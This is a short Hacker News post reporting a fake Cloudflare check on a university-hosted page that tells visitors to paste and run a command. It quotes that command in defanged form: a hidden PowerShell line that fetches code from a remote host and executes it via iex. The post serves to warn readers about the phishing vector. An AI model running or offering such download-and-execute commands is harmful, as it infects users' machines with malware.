from Hacker News

Is this a new attack vector?

by archon810 on 4/29/25, 11:21 PM with 1 comments

  • by archon810 on 4/29/25, 11:21 PM

    Has this phishing/infection vector been exposed yet? I visited a website of some professor hosted at a university. I was presented with the following Cloudflare message I've never seen before (image in linked tweet).

    When I read the instructions, I had to do a double take. How many unsuspecting internet users would do this without thinking twice?

    Win+R (run prompt), Ctrl+V (paste), Enter (execute).

    What are we executing? This (I replaced . with [DOT]): powershell -w h "curl bronxy[DOT]cc/sign/in|iex"

    Threat actors often use the "iex" command for their ability to launch both local and remote payloads. I curled the url, and for me, it showed a Teams exe from MS (VirusTotal here: https://virustotal.com/gui/url/fb9945173e557129d38ccdf204622...), but I wonder if the response switches to something malicious sometimes.